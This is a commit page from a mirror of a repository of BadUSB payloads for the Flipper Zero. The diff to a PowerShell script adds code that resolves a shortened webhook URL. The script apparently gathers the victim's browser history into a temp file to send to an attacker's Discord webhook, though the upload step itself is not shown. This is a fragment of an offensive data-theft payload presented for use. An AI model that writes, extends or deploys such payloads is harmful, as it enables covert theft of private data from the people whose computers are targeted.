mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-04-28 17:38:45 -07:00
Update main.ps1
This commit is contained in:
@@ -1,6 +1,9 @@
|
||||
|
||||
$whuri = "$dc"
|
||||
|
||||
# shortened URL Detection
|
||||
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
|
||||
|
||||
$outpath = "$env:temp\history.txt"
|
||||
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII
|
||||
|
||||
|
||||
Reference in New Issue
Block a user